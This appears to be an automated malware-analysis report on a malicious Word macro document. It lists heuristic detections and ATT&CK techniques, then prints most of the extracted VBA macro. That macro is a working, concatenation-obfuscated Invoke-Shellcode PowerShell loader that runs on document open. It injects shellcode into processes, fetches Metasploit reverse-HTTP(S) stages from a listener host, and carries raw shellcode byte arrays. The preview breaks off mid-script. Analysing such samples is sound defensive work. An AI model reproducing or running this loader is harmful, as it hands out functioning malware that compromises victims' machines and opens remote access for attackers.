MALICIOUS
Risk Score: 666

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains VBA macros that execute PowerShell commands, indicative of a downloader or dropper. The macros utilize WMI to launch processes and appear to be designed to download and execute a second-stage payload. The presence of VirtualAlloc and WriteProcessMemory API calls suggests the payload may involve shellcode execution.
Heuristics (18)

- CVE-2007-3899 — Microsoft Word malformed string memory corruption [critical] (rule CVE_2007_3899; tags: CVE, likely). Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
- ClamAV: Doc.Dropper.Donoff-5743532-0 [critical] (rule CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Dropper.Donoff-5743532-0.
- Reference to WriteProcessMemory API [critical] (rule SC_STR_WRITEPROCESSMEMORY).
- Reference to CreateRemoteThread API [critical] (rule SC_STR_CREATEREMOTETHREAD).
- VBA macros detected [medium] (rule OLE_VBA_MACROS; 8 related findings). Document contains VBA macro code.
- Potential Shell call in VBA [critical] (rule OLE_VBA_SHELL). Matched line in script: `[Sy" e = e + "stem.Runtime.InteropServices.Marshal]::Copy($Shell" e = e + "code, 0, $BaseAddress, $Shellcode.Length)"`
- PowerShell reference in VBA [critical] (rule OLE_VBA_PS). Matched line in script: `" e = e + " if ((!$IsWow64) -and $PowerShell32bit)" "`
- VBA WMI Win32_Process launcher [critical] (rule OLE_VBA_WMI_PROCESS_CREATE). VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions. Matched line in script: `strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup")`
- GetObject call [high] (rule OLE_VBA_GETOBJ). Matched line in script: `strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup")`
- VBA p-code auto-exec with execution tokens [high] (rule OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] (rule OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen() pVh`
- Document_Open macro [low] (rule OLE_VBA_DOCOPEN). Matched line in script: `Sub Document_Open() pVh`
- Auto_Open macro [low] (rule OLE_VBA_AUTO). Matched line in script: `Attribute VB_Customizable = True Sub Auto_Open() pVh`
- Reference to PowerShell [high] (rule SC_STR_POWERSHELL).
- Reference to GetProcAddress API [high] (rule SC_STR_GETPROCADDRESS).
- Reference to VirtualAlloc API [medium] (rule SC_STR_VIRTUALALLOC).
- Legacy WordBasic auto-exec macro marker [medium] (rule OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (rule EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31213 bytes |

SHA-256: 86ff6884a672f145df1211592361273555e6bfd9bb22854baec2f8a114c5fc20

Preview of script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
pVh
End Sub
Sub AutoOpen()
pVh
End Sub
Sub Document_Open()
pVh
End Sub
Public Function pVh() As Variant
Dim e As String
e = "function Invoke-Shellcode"
{
[CmdletBinding( Defa"
e = e + "ultParameterSetName = 'RunLocal', SupportsShouldPr"
e = e + "ocess = $True , ConfirmImpact = 'High')] Param ("
"
e = e + " [ValidateNotNullOrEmpty()]"
[UInt16]
"
e = e + "$ProcessID,"
[Parameter( ParameterSetName = 'R"
e = e + "unLocal' )]"
[ValidateNotNullOrEmpty()]
["
e = e + "Byte[]]"
$Shellcode,
[Parameter( Paramete"
e = e + "rSetName = 'Metasploit' )]"
[ValidateSet( 'win"
e = e + "dows/meterpreter/reverse_http',"
"
e = e + " 'windows/meterpreter/reverse_https',"
"
e = e + " IgnoreCase = $True )]"
[String]
$P"
e = e + "ayload = 'windows/meterpreter/reverse_http',"
"
e = e + "[Parameter( ParameterSetName = 'ListPayloads' )]"
"
e = e + " [Switch]"
$ListMetasploitPayloads,
[P"
e = e + "arameter( Mandatory = $True,"
Para ""
e = e + "meterSetName = 'Metasploit' )]"
[ValidateNotNu"
e = e + "llOrEmpty()]"
[String]
$Lhost = '127.0.0."
e = e + "1',"
[Parameter( Mandatory = $True,
"
e = e + " ParameterSetName = 'Metasploit' )]"
[Va"
e = e + "lidateRange( 1,65535 )]"
[Int]
$Lport = 8"
e = e + "443,"
[Parameter( ParameterSetName = 'Metasplo"
e = e + "it' )]"
[ValidateNotNull()]
[String]
"
e = e + " $UserAgent = (Get-ItemProperty -Path 'HKCU:\Softw"
e = e + "are\Microsoft\Windows\CurrentVersion\Internet Sett"
e = e + "ings').'User Agent',"
[Parameter( ParameterSet"
e = e + "Name = 'Metasploit' )]"
[ValidateNotNull()]
"
e = e + " [Switch]"
$Legacy = $False,
[Parameter"
e = e + "( ParameterSetName = 'Metasploit' )]"
[Validat"
e = e + "eNotNull()]"
[Switch]
$Proxy = $False,
"
e = e + " [Switch]"
$Force = $False
)
Set-Stric"
e = e + "tMode -Version 2.0"
if ($PsCmdlet.ParameterSet"
e = e + "Name -eq 'ListPayloads')"
{
$Availabl"
e = e + "ePayloads = (Get-Command Invoke-Shellcode).Paramet"
e = e + "ers['Payload'].Attributes |"
Where-Obj"
e = e + "ect {$_.TypeId -eq [System.Management.Automation.V"
e = e + "alidateSetAttribute]}"
foreach ($Payload i"
e = e + "n $AvailablePayloads.ValidValues)"
{
"
e = e + " New-Object PSObject -Property @{ Payloads "
e = e + "= $Payload }"
}
Return
}
"
e = e + " if ( $PSBoundParameters['ProcessID'] )"
{
"
e = e + " Get-Process -Id $ProcessID -ErrorAction Sto"
e = e + "p | Out-Null"
}
function Local:Get-Delega"
e = e + "teType"
{
Param
(
"
e = e + " [OutputType([Type])]"
[Parameter( P"
e = e + "osition = 0)]"
[Type[]]
$"
e = e + "Parameters = (New-Object Type[](0)),"
"
e = e + "[Parameter( Position = 1 )]"
[Type]
"
e = e + " $ReturnType = [Void]"
)
"
e = e + " $Domain = [AppDomain]::CurrentDomain"
$D"
e = e + "ynAssembly = New-Object System.Reflection.Assembly"
e = e + "Name('ReflectedDelegate')"
$AssemblyBuilde"
e = e + "r = $Domain.DefineDynamicAssembly($DynAssembly, [S"
e = e + "ystem.Reflection.Emit.AssemblyBuilderAccess]::Run)"
e = e + ""
$ModuleBuilder = $AssemblyBuilder.Define"
e = e + "DynamicModule('InMemoryModule', $false)"
$"
e = e + "TypeBuilder = $ModuleBuilder.DefineType('MyDelegat"
e = e + "eType', 'Class, Public, Sealed, AnsiClass, AutoCla"
e = e + "ss', [System.MulticastDelegate])"
$Constru"
e = e + "ctorBuilder = $TypeBuilder.DefineConstructor('RTSp"
e = e + "ecialName, HideBySig, Public', [System.Reflection."
e = e + "CallingConventions]::Standard, $Parameters)"
"
e = e + " $ConstructorBuilder.SetImplementationFlags('Run"
e = e + "time, Managed')"
$MethodBuilder = $TypeBui"
e = e + "lder.DefineMethod('Invoke', 'Public, HideBySig, Ne"
e = e + "wSlot, Virtual', $ReturnType, $Parameters)"
"
e = e + " $MethodBuilder.SetImplementationFlags('Runtime, "
e = e + "Managed')"
Write-Output $TypeBuilder.Creat"
e = e + "eType()"
}
function Local:Get-ProcAddress"
e = e + ""
{
Param
(
[Ou"
e = e + "tputType([IntPtr])]"
[Parameter( Posit"
e = e + "ion = 0, Mandatory = $True )]"
[String"
e = e + "]"
$Module,
[Parameter( P"
e = e + "osition = 1, Mandatory = $True )]"
[St"
e = e + "ring]"
$Procedure
)
"
e = e + "$SystemAssembly = [AppDomain]::CurrentDomain.GetAs"
e = e + "semblies() |"
Where-Object { $_.Global"
e = e + "AssemblyCache -And $_.Location.Split('\\')[-1].Equ"
e = e + "als('System.dll') }"
$UnsafeNativeMethods "
e = e + "= $SystemAssembly.GetType('Microsoft.Win32.UnsafeN"
e = e + "ativeMethods')"
$GetModuleHandle = $Unsafe"
e = e + "NativeMethods.GetMethod('GetModuleHandle')"
"
e = e + " $GetProcAddress = $UnsafeNativeMethods.GetMethod"
e = e + "('GetProcAddress')"
$Kern32Handle = $GetMo"
e = e + "duleHandle.Invoke($null, @($Module))"
$tmp"
e = e + "Ptr = New-Object IntPtr"
$HandleRef = New-"
e = e + "Object System.Runtime.InteropServices.HandleRef($t"
e = e + "mpPtr, $Kern32Handle)"
Write-Output $GetPr"
e = e + "ocAddress.Invoke($null, @([System.Runtime.InteropS"
e = e + "ervices.HandleRef]$HandleRef, $Procedure))"
}
"
e = e + ""
function Local:Emit-CallThreadStub ([IntPtr] "
e = e + "$BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Archit"
e = e + "ecture)"
{
$IntSizePtr = $Architectur"
e = e + "e / 8"
function Local:ConvertTo-LittleEndi"
e = e + "an ([IntPtr] $Address)"
{
$Li"
e = e + "ttleEndianByteArray = New-Object Byte[](0)"
"
e = e + " $Address.ToString("X$($IntSizePtr*2)") -spli"
e = e + "t '([A-F0-9]{2})' | ForEach-Object { if ($_) { $Li"
e = e + "ttleEndianByteArray += [Byte] ('0x{0}' -f $_) } }"
"
e = e + ""
[System.Array]::Reverse($LittleEndian"
e = e + "ByteArray)"
Write-Output $LittleEndian"
e = e + "ByteArray"
}
$CallStub = New-Obje"
e = e + "ct Byte[](0)"
if ($IntSizePtr -eq 8)
"
e = e + " {"
[Byte[]] $CallStub = 0x48,0xB8 "
e = e + " # MOV QWORD RAX, &shellcode"
e = e + ""
$CallStub += ConvertTo-LittleEndian "
e = e + "$BaseAddr # &shellcode"
$CallStu"
e = e + "b += 0xFF,0xD0 # CALL"
e = e + " RAX"
$CallStub += 0x6A,0x00 "
e = e + " # PUSH BYTE 0"
$"
e = e + "CallStub += 0x48,0xB8 "
e = e + " # MOV QWORD RAX, &ExitThread"
$Call"
e = e + "Stub += ConvertTo-LittleEndian $ExitThreadAddr # &"
e = e + "ExitThread"
$CallStub += 0xFF,0xD0 "
e = e + " # CALL RAX"
}
"
e = e + " else"
{
[Byte[]] $Cal"
e = e + "lStub = 0xB8 # MOV DWO"
e = e + "RD EAX, &shellcode"
$CallStub += Conve"
e = e + "rtTo-LittleEndian $BaseAddr # &shellcode"
"
e = e + " $CallStub += 0xFF,0xD0 "
e = e + " # CALL EAX"
$CallStub += "
e = e + "0x6A,0x00 # PUSH BYT"
e = e + "E 0"
$CallStub += 0xB8 "
e = e + " # MOV DWORD EAX, &ExitThread"
"
e = e + ""
$CallStub += ConvertTo-LittleEndian $"
e = e + "ExitThreadAddr # &ExitThread"
$CallStu"
e = e + "b += 0xFF,0xD0 # CALL"
e = e + " EAX"
}
Write-Output $CallStub
"
e = e + " }"
function Local:Inject-RemoteShellcode ("
e = e + "[Int] $ProcessID)"
{
$hProcess = $Ope"
e = e + "nProcess.Invoke(0x001F0FFF, $false, $ProcessID) # "
e = e + "ProcessAccessFlags.All (0x001F0FFF)"
if (!"
e = e + "$hProcess)"
{
Throw "Unable t"
e = e + "o open a process handle for PID: $ProcessID"
"
e = e + " }"
$IsWow64 = $false
if ($64b"
e = e + "itCPU) # Only perform theses checks if CPU is 64-b"
e = e + "it"
{
$IsWow64Process.Invoke("
e = e + "$hProcess, [Ref] $IsWow64) | Out-Null"
"
e = e + " if ((!$IsWow64) -and $PowerShell32bit)"
"
e = e + " {"
Throw 'Unable to inject 64-b"
e = e + "it shellcode from within 32-bit Powershell. Use th"
e = e + "e 64-bit version of Powershell if you want this to"
e = e + " work.'"
}
elseif ($IsWow"
e = e + "64) # 32-bit Wow64 process"
{
"
e = e + " if ($Shellcode32.Length -eq 0)"
"
e = e + " {"
Throw 'No shellcode "
e = e + "was placed in the $Shellcode32 variable!'"
"
e = e + " }"
$Shellcode = $Shellcod"
e = e + "e32"
}
else # 64-bit proc"
e = e + "ess"
{
if ($Shellcode"
e = e + "64.Length -eq 0)"
{
"
e = e + " Throw 'No shellcode was placed in the $Shel"
e = e + "lcode64 variable!'"
}
"
e = e + " $Shellcode = $Shellcode64"
}
"
e = e + " }"
else # 32-bit CPU
{
"
e = e + " if ($Shellcode32.Length -eq 0)"
"
e = e + " {"
Throw 'No shellcode was place"
e = e + "d in the $Shellcode32 variable!'"
}
"
e = e + " $Shellcode = $Shellcode32"
}
"
e = e + " $RemoteMemAddr = $VirtualAllocEx.Invoke($hP"
e = e + "rocess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3"
e = e + "000, 0x40) # (Reserve|Commit, RWX)"
if (!$"
e = e + "RemoteMemAddr)"
{
Throw "Unab"
e = e + "le to allocate shellcode memory in PID: $ProcessID"
e = e + ""
}
$WriteProcessMemory.Invoke($"
e = e + "hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.L"
e = e + "ength, [Ref] 0) | Out-Null"
$ExitThreadAdd"
e = e + "r = Get-ProcAddress kernel32.dll ExitThread"
"
e = e + " if ($IsWow64)"
{
$CallStub"
e = e + " = Emit-CallThreadStub $RemoteMemAddr $ExitThreadA"
e = e + "ddr 32"
}
Else
{
"
e = e + " $CallStub = Emit-CallThreadStub $RemoteMemAd"
e = e + "dr $ExitThreadAddr 64"
}
$RemoteS"
e = e + "tubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPt"
e = e + "r]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reser"
e = e + "ve|Commit, RWX)"
if (!$RemoteStubAddr)
"
e = e + " {"
Throw "Unable to allocate thr"
e = e + "ead call stub memory in PID: $ProcessID"
"
e = e + "}"
$WriteProcessMemory.Invoke($hProcess, $"
e = e + "RemoteStubAddr, $CallStub, $CallStub.Length, [Ref]"
e = e + " 0) | Out-Null"
$ThreadHandle = $CreateRem"
e = e + "oteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $Re"
e = e + "moteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)"
"
e = e + " if (!$ThreadHandle)"
{
"
e = e + " Throw "Unable to launch remote thread in PID: $P"
e = e + "rocessID"
}
$CloseHandle.Invoke("
e = e + "$hProcess) | Out-Null"
}
function Local:I"
e = e + "nject-LocalShellcode"
{
if ($PowerShe"
e = e + "ll32bit) {"
if ($Shellcode32.Length -e"
e = e + "q 0)"
{
Throw 'No she"
e = e + "llcode was placed in the $Shellcode32 variable!'"
"
e = e + " return"
}
"
e = e + " $Shellcode = $Shellcode32"
}
els ""
e = e + "e"
{
if ($Shellcode64.Length "
e = e + "-eq 0)"
{
Throw 'No s"
e = e + "hellcode was placed in the $Shellcode64 variable!'"
e = e + ""
Return
}
"
e = e + " $Shellcode = $Shellcode64"
}
$"
e = e + "BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero,"
e = e + " $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|C"
e = e + "ommit, RWX)"
if (!$BaseAddress)
{"
e = e + ""
Throw "Unable to allocate shellcode "
e = e + "memory in PID: $ProcessID"
}
[Sy"
e = e + "stem.Runtime.InteropServices.Marshal]::Copy($Shell"
e = e + "code, 0, $BaseAddress, $Shellcode.Length)"
"
e = e + " $ExitThreadAddr = Get-ProcAddress kernel32.dll Ex"
e = e + "itThread"
if ($PowerShell32bit)
{"
e = e + ""
$CallStub = Emit-CallThreadStub $Bas"
e = e + "eAddress $ExitThreadAddr 32"
}
el ""
e = e + "se"
{
$CallStub = Emit-CallTh"
e = e + "readStub $BaseAddress $ExitThreadAddr 64"
"
e = e + "}"
$CallStubAddress = $VirtualAlloc.Invoke"
e = e + "([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x4"
e = e + "0) # (Reserve|Commit, RWX)"
if (!$CallStub"
e = e + "Address)"
{
Throw "Unable to "
e = e + "allocate thread call stub."
}
[S"
e = e + "ystem.Runtime.InteropServices.Marshal]::Copy($Call"
e = e + "Stub, 0, $CallStubAddress, $CallStub.Length)"
"
e = e + " $ThreadHandle = $CreateThread.Invoke([IntPtr]:"
e = e + ":Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntP"
e = e + "tr]::Zero)"
if (!$ThreadHandle)
{"
e = e + ""
Throw "Unable to launch thread."
"
e = e + " }"
$WaitForSingleObject.Invoke($Thre"
e = e + "adHandle, 0xFFFFFFFF) | Out-Null"
$Virtual"
e = e + "Free.Invoke($CallStubAddress, $CallStub.Length + 1"
e = e + ", 0x8000) | Out-Null # MEM_RELEASE (0x8000)"
"
e = e + " $VirtualFree.Invoke($BaseAddress, $Shellcode.Le"
e = e + "ngth + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000"
e = e + ")"
}
$IsWow64ProcessAddr = Get-ProcAddres"
e = e + "s kernel32.dll IsWow64Process"
if ($IsWow64Pro"
e = e + "cessAddr)"
{
$IsWow64ProcessDelegate "
e = e + "= Get-DelegateType @([IntPtr], [Bool].MakeByRefTyp"
e = e + "e()) ([Bool])"
$IsWow64Process = [System.R"
e = e + "untime.InteropServices.Marshal]::GetDelegateForFun"
e = e + "ctionPointer($IsWow64ProcessAddr, $IsWow64ProcessD"
e = e + "elegate)"
$64bitCPU = $true
}
el ""
e = e + "se"
{
$64bitCPU = $false
}
"
e = e + "if ([IntPtr]::Size -eq 4)"
{
$PowerSh"
e = e + "ell32bit = $true"
}
Else
{
"
e = e + "$PowerShell32bit = $false"
}
if ($PsCmdle"
e = e + "t.ParameterSetName -eq 'Metasploit')"
{
"
e = e + " if (!$PowerShell32bit) {"
$RootInvo"
e = e + "cation = $MyInvocation.Line"
$Response"
e = e + " = $True"
if ( $Force -or ( $Response "
e = e + "= $psCmdlet.ShouldContinue( "Do you want to launch"
e = e + " the payload from x86 Powershell?",
"
e = e + " "Attempt to execute 32-bit shellcode from 64"
e = e + "-bit Powershell. Note: This process takes about on"
e = e + "e minute. Be patient! You will also see some artif"
e = e + "acts of the script loading in the other process." "
e = e + ") ) ) { }"
if ( !$Response )
"
e = e + " {"
Return
}
"
e = e + " if ($MyInvocation.BoundParameters['Force']"
e = e + ")"
{
$Command = "func"
e = e + "tion $($MyInvocation.InvocationName) {`n" + $MyInv"
e = e + "ocation.MyCommand.ScriptBlock + "`n}`n$($RootInvoc"
e = e + "ation)`n`n"
}
Else
"
e = e + " {"
$Command = "function $("
e = e + "$MyInvocation.InvocationName) {`n" + $MyInvocation"
e = e + ".MyCommand.ScriptBlock + "`n}`n$($RootInvocation) "
e = e + "-Force`n`n"
}
$CommandBy"
e = e + "tes = [System.Text.Encoding]::Ascii.GetBytes($Comm"
e = e + "and)"
$EncodedCommand = [Convert]::ToB"
e = e + "ase64String($CommandBytes)"
$Execute ="
e = e + " '$Command' + " | $Env:windir\SysWOW64\WindowsPowe"
e = e + "rShell\v1.0\powershell.exe -NoProfile -Command -"
"
e = e + ""
Invoke-Expression -Command $Execute |"
e = e + " Out-Null"
Return
}
"
e = e + "$Response = $True"
if ( $Force -or ( $Resp"
e = e + "onse = $psCmdlet.ShouldContinue( "Do you know what"
e = e + " you're doing?",
"About to downloa"
e = e + "d Metasploit payload '$($Payload)' LHOST=$($Lhost)"
e = e + ", LPORT=$($Lport)" ) ) ) { }
if ( !$Respo"
e = e + "nse )"
{
Return
}
"
e = e + " switch ($Payload)"
{
'"
e = e + "windows/meterpreter/reverse_http'"
{
"
e = e + " $SSL = ''"
}
"
e = e + " 'windows/meterpreter/reverse_https'"
"
e = e + " {"
$SSL = 's'
"
e = e + "[System.Net.ServicePointManager]::ServerCertificat"
e = e + "eValidationCallback = {$True}"
}
"
e = e + " }"
if ($Legacy)
{
"
e = e + " $Request = "http$($SSL)://$($Lhost):$($Lport)/I"
e = e + "NITM"
} else {
$CharArray = "
e = e + "48..57 + 65..90 + 97..122 | ForEach-Object {[Char]"
e = e + "$_}"
$SumTest = $False
wh ""
e = e + "ile ($SumTest -eq $False) "
{
"
e = e + " $GeneratedUri = $CharArray | Get-Random -"
e = e + "Count 4"
$SumTest = (([int[]] $Gen"
e = e + "eratedUri | Measure-Object -Sum).Sum % 0x100 -eq 9"
e = e + "2)"
}
$RequestUri = -join"
e = e + " $GeneratedUri"
$Request = "http$($SSL"
e = e + ")://$($Lhost):$($Lport)/$($RequestUri)"
"
e = e + "}"
$Uri = New-Object Uri($Request)
"
e = e + " $WebClient = New-Object System.Net.WebClient"
"
e = e + " $WebClient.Headers.Add('user-agent', "$UserA"
e = e + "gent")
if ($Proxy)
{
"
e = e + " $WebProxyObject = New-Object System.Net.WebProxy"
e = e + ""
$ProxyAddress = (Get-ItemProperty -P"
e = e + "ath 'HKCU:\Software\Microsoft\Windows\CurrentVersi"
e = e + "on\Internet Settings').ProxyServer"
if"
e = e + " ($ProxyAddress) "
{
"
e = e + "$WebProxyObject.Address = $ProxyAddress"
"
e = e + " $WebProxyObject.UseDefaultCredentials = $Tr"
e = e + "ue"
$WebClientObject.Proxy = $WebP"
e = e + "roxyObject"
}
}
try
"
e = e + ""
{
[Byte[]] $Shellcode32 = $W"
e = e + "ebClient.DownloadData($Uri)"
}
ca ""
e = e + "tch"
{
Throw "$($Error[0].Exc"
e = e + "eption.InnerException.InnerException.Message)"
"
e = e + " }"
[Byte[]] $Shellcode64 = $Shellcod"
e = e + "e32"
}
elseif ($PSBoundParameters['Shellc"
e = e + "ode'])"
{
[Byte[]] $Shellcode32 = $Sh"
e = e + "ellcode"
[Byte[]] $Shellcode64 = $Shellcod"
e = e + "e32"
}
Else
{
[Byte[]] $She"
e = e + "llcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x"
e = e + "89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,"
"
e = e + " 0x52,0x0c,0x8b,0x52,0"
e = e + "x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0"
e = e + "x31,0xc0,"
0 xac , ""
e = e + "0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,"
e = e + "0xc7,0xe2,0xf0,0x52,0x57,"
"
e = e + " 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0"
e = e + ",0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,"
"
e = e + " 0xd0,0x50,0x8b,0x48,0x1"
e = e + "8,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x3"
e = e + "4,0x8b,"
0x01,0x"
e = e + "d6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0x"
e = e + "c7,0x38,0xe0,0x75,0xf4,"
"
e = e + " 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0"
e = e + "x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,"
"
e = e + " 0x0c,0x4b,0x8b,0x58,0x1c,"
e = e + "0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,"
e = e + "0x24,"
0x5b,0x5b"
e = e + ",0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b"
e = e + ",0x12,0xeb,0x86,0x5d,"
"
e = e + " 0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x5"
e = e + "0,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,"
"
e = e + " 0xbb,0xe0,0x1d,0x2a,0x0a,0x"
e = e + "68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x"
e = e + "0a,"
0x80,0xfb,0"
e = e + "xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0"
e = e + "x53,0xff,0xd5,0x63,"
"
e = e + " 0x61,0x6c,0x63,0x00)"
[Byte[]] $Shell"
e = e + "code64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00"
e = e + ",0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,"
"
e = e + " 0x56,0x48,0x31,0xd2,0x6"
e = e + "5,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8"
e = e + "b,0x52,"
0x20,0x"
e = e + "48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x"
e = e + "31,0xc9,0x48,0x31,0xc0,"
"
e = e + " 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0"
e = e + "xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,"
"
e = e + " 0x52,0x41,0x51,0x48,0x8b,"
e = e + "0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,"
e = e + "0x88,"
0x00,0x00"
e = e + ",0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50"
e = e + ",0x8b,0x48,0x18,0x44,"
"
e = e + " 0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4"
e = e + "8,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,"
"
e = e + " 0x01,0xd6,0x4d,0x31,0xc9,0x"
e = e + "48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0x"
e = e + "c1,"
0x38,0xe0,0"
e = e + "x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0"
e = e + "x75,0xd8,0x58,0x44,"
"
e = e + " 0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,"
e = e + "0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,"
"
e = e + " 0x01,0xd0,0x41,0x8b,0x04,0x88"
e = e + ",0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a"
e = e + ","
0x41,0x58,0x4"
e = e + "1,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xf"
e = e + "f,0xe0,0x58,0x41,"
"
e = e + " 0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0x"
e = e + "ff,0x5d,0x48,0xba,0x01,0x00,0x00,"
"
e = e + " 0x00,0x00,0x00,0x00,0x00,0x48,0"
e = e + "x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,"
"
e = e + ""
0x6f,0x87,0xff,"
e = e + "0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,"
e = e + "0xbd,0x9d,0xff,"
"
e = e + " 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80"
e = e + ",0xfb,0xe0,0x75,0x05,0xbb,0x47,"
"
e = e + " 0x13,0x72,0x6f,0x6a,0x00,0x59,0x4"
e = e + "1,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)"
"
e = e + " }"
if ( $PSBoundParameters['ProcessID'] )
"
e = e + " {"
$OpenProcessAddr = Get-ProcAddress "
e = e + "kernel32.dll OpenProcess"
$OpenProcessDele"
e = e + "gate = Get-DelegateType @([UInt32], [Bool], [UInt3"
e = e + "2]) ([IntPtr])"
$OpenProcess = [System.Run"
e = e + "time.InteropServices.Marshal]::GetDelegateForFunct"
e = e + "ionPointer($OpenProcessAddr, $OpenProcessDelegate)"
e = e + ""
$VirtualAllocExAddr = Get-ProcAddress ke"
e = e + "rnel32.dll VirtualAllocEx"
$VirtualAllocEx"
e = e + "Delegate = Get-DelegateType @([IntPtr], [IntPtr], "
e = e + "[Uint32], [UInt32], [UInt32]) ([IntPtr])"
"
e = e + "$VirtualAllocEx = [System.Runtime.InteropServices."
e = e + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
e = e + "locExAddr, $VirtualAllocExDelegate)"
$Writ"
e = e + "eProcessMemoryAddr = Get-ProcAddress kernel32.dll "
e = e + "WriteProcessMemory"
$WriteProcessMemoryDel"
e = e + "egate = Get-DelegateType @([IntPtr], [IntPtr], [By"
e = e + "te[]], [UInt32], [UInt32].MakeByRefType()) ([Bool]"
e = e + ")"
$WriteProcessMemory = [System.Runtime.I"
e = e + "nteropServices.Marshal]::GetDelegateForFunctionPoi"
e = e + "nter($WriteProcessMemoryAddr, $WriteProcessMemoryD"
e = e + "elegate)"
$CreateRemoteThreadAddr = Get-Pr"
e = e + "ocAddress kernel32.dll CreateRemoteThread"
"
e = e + " $CreateRemoteThreadDelegate = Get-DelegateType @("
e = e + "[IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], "
e = e + "[UInt32], [IntPtr]) ([IntPtr])"
$CreateRem"
e = e + "oteThread = [System.Runtime.InteropServices.Marsha"
e = e + "l]::GetDelegateForFunctionPointer($CreateRemoteThr"
e = e + "eadAddr, $CreateRemoteThreadDelegate)"
$Cl"
e = e + "oseHandleAddr = Get-ProcAddress kernel32.dll Close"
e = e + "Handle"
$CloseHandleDelegate = Get-Delegat"
e = e + "eType @([IntPtr]) ([Bool])"
$CloseHandle ="
